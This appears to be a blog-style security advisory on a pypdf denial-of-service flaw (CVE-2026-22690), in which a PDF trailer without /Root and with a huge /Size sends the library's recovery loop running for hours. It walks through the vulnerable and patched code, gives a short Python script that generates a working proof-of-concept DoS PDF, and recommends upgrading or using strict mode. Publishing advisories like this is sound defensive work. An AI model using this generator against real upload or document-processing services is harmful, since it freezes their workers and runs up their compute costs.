Feb 22, 2026·6 min read·2 visits
pypdf tries too hard to fix broken PDFs. If a file is missing the Root object but claims to have 2 billion objects in its Size trailer, pypdf will check every single one. This loops until the CPU burns out or the universe ends.
A resource consumption vulnerability in pypdf allows attackers to trigger a Denial of Service via malformed PDF trailers. By removing the '/Root' key and inflating the '/Size' parameter, the library enters an effectively infinite loop trying to 'repair' the file, consuming 100% CPU.
We often praise software for being "robust" or "fault-tolerant." In the world of PDF parsing—a format that is essentially a dumpster fire of legacy specs and vendor-specific hacks—libraries have to be forgiving. If a PDF is slightly broken, users expect the library to fix it and show them the content. Enter pypdf, a pure-Python library that powers thousands of document processing pipelines.
But here is the catch: there is a fine line between being helpful and being gullible. CVE-2026-22690 is a classic example of the latter. It is not a memory corruption bug; it is a logic flaw born from kindness. When pypdf encounters a specifically malformed PDF, it doesn't throw an error. Instead, it rolls up its sleeves and attempts a "recovery" operation that an attacker can trick into taking effectively forever.
This isn't about stealing data; it's about freezing the gears of any application that processes untrusted PDFs. Think invoice parsers, resume scanners, or automated archiving bots. One 1KB file can lock up a worker thread indefinitely.
To understand the bug, you need to know a tiny bit about PDF structure. A PDF has a "Trailer" dictionary that tells the parser where to start. The most important key in the trailer is /Root, which points to the Document Catalog (the root of the object tree). The trailer also usually contains a /Size key, indicating the total number of objects in the file.
Here is the logic flaw in pypdf versions prior to 6.6.0: If the /Root key is missing (which makes the PDF technically invalid), the library assumes the file is just slightly corrupted. It activates a "recovery mode" to hunt for the Catalog manually.
How does it know where to look? It asks the /Size key. If the file says, "Hey, I have 100 objects," pypdf iterates through indices 0 to 100, resolving each object to see if it looks like a Catalog. The problem is that /Size is just a number in the text file. An attacker can set /Size to 2,147,483,647 (INT_MAX), remove the /Root key, and provide a file with only 1 actual object. The library will then dutifully attempt to resolve 2 billion non-existent objects, burning CPU cycles on dictionary lookups and file seeking for hours.
Let's look at the smoking gun in pypdf/_reader.py. This is the code that runs when strict=False (which is often the default or preferred mode for compatibility).
Vulnerable Code (< 6.6.0):
# Inside PdfReader.root_object
root = self.trailer.get("/Root")
if root is None:
# Oh no, no Root! Let's find it.
nb = self.trailer.get("/Size", 0)
# The Loop of Doom:
for i in range(nb):
# This triggers parsing logic for every theoretical ID
obj = self.get_object(i + 1)
if isinstance(obj, DictionaryObject) and obj.get("/Type") == "/Catalog":
self._validated_root = obj
breakSee that range(nb)? That is the kill switch. The variable nb is taken directly from the attacker-controlled input. There was no cap, no timeout, and no sanity check.
The Fix (v6.6.0):
The maintainers introduced a sanity limit. Even if the file claims to have billions of objects, the recovery logic now gives up after a set number of attempts (default 10,000).
# The patched logic
limit = self.root_object_recovery_limit # Default 10000
nb = self.trailer.get("/Size", 0)
# Bounded range prevents infinite loop
for i in range(min(nb, limit)):
# ... logic ...It is a simple fix: never trust the input to define the bounds of your loops.
We don't need a complex fuzzer to trigger this. We can write this "exploit" by hand in a text editor. We need a valid PDF header, one dummy object so the parser doesn't crash immediately, and a malicious trailer.
Here is the recipe for disaster:
%PDF-1.7/Root, set /Size to max integer.# malicious_gen.py
exploit_pdf = (
b"%PDF-1.7\n" # Header
b"1 0 obj << >> endobj\n" # Object 1 (Dummy)
b"trailer << "
b" /Size 2147483647 " # The Trap: 2 billion objects
b">>\n" # Note: No /Root key!
b"startxref\n0\n%%EOF" # End of file
)
with open("dos.pdf", "wb") as f:
f.write(exploit_pdf)When a vulnerable pypdf instance opens this file and tries to access reader.pages or any property requiring the root, it hits the root_object() method. It sees root is missing. It reads /Size. It starts counting. If you monitor the process, you'll see one CPU core instantly pin to 100%. In a single-threaded Python web worker, this request will never return until the web server times it out.
Security researchers often roll their eyes at DoS bugs because they don't provide a shell. But in the context of modern cloud architecture, this is a wallet-draining vulnerability.
Imagine a SaaS platform that allows users to upload PDFs for OCR or signing. These services often use Python backends (Django/Flask/FastAPI) wrapping pypdf. If an attacker uploads 10 of these 1KB files, they can permanently lock up 10 worker processes.
If the infrastructure creates new instances to handle load (autoscaling), the attacker just triggered a financial exploit—forcing the victim to pay for compute credits to process a loop that does nothing. Because this happens in user-space Python code, it might not trigger low-level segfault protections. It just sits there, burning electricity.
The remediation is straightforward, but it requires action. The patch was released in version 6.6.0.
Primary Fix: Update your requirements file immediately.
pip install pypdf>=6.6.0Workaround (If you can't update):
If you are stuck on legacy versions, you must instantiate the PdfReader with strict mode enabled. This disables the recovery logic entirely. If a PDF is broken, it will raise an exception instead of looping forever.
# strict=True disables the "best effort" recovery
reader = PdfReader(stream, strict=True)However, be warned: strict=True is very strict. It will reject many benign-but-slightly-malformed PDFs that users generate from cheap export tools. The only real fix is the patch.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L| Product | Affected Versions | Fixed Version |
|---|---|---|
pypdf py-pdf | < 6.6.0 | 6.6.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network (Context-dependent) |
| Impact | Denial of Service (High CPU/Hang) |
| EPSS Score | 0.00019 (Low Probability) |
| KEV Status | Not Listed |
The software does not properly control the allocation and maintenance of a limited resource (CPU), thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.